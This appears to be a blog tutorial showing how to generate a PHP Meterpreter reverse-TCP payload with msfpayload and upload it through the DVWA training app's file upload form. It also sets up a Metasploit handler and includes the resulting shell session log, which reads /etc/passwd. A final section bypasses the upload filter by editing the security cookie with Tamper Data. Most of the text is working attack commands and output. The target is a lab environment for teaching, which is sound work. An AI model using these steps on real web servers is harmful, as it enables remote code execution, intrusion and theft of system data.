control – metasploit php file upload

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit.

1.Using msfpayload in backtrack 5r1

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php

2. Connection.php is created in root.

3. Open msfconsole

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST Your-IP-Address

set LPORT 8080

exploit

4. Upload the file to a website then search for it eg dvwa/hackable/uploads
[ ]    connection.php    21-Jan-2011 11:06     1.3K

5. Double click it.

This should make the remote server tunnel back to your pc.

[*] Started reverse handler on your-ip-addrses:8080
[*] Starting the payload handler…
[*] Sending stage (38791 bytes) to there-ip-addrses
[*] Meterpreter session 1 opened (your-ip-addrses:8080 -> there-ip-addrses:49119) at 2012-06-26 15:00:18 +0100

meterpreter >

meterpreter > sysinfo
Computer    : dojo-vm
OS          : Linux dojo-vm 2.6.32-25-generic #44-Ubuntu SMP Fri Sep 17 20:26:08 UTC 2010 i686
Meterpreter : php/php

meterpreter > getuid
Server username: www-data (33)
meterpreter > shell
Process 1639 created.
Channel 0 created.

ls -l
total 8
-rw-r–r– 1 www-data www-data 1318 Jun 26 09:58 connectback.php
-rw-r–r– 1 www-data www-data  667 Sep 30  2010 dvwa_email.png

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
dojo:x:1000:1000:Dojo,,,:/home/dojo:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false

 

 

If you get Your image was not uploaded.

1. Open firefox Tamper Data plugin and start tamper.

Re upload .php and look under Request Header Value

Cookie=security=high; security=low; PHPSESSID=p3lhtk3vnc2tb9oo9s4e89okn0

2. change this to

Cookie=security=low; security=low; PHPSESSID=p3lhtk3vnc2tb9oo9s4e89okn0

3. tamper to push

image was uploaded

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s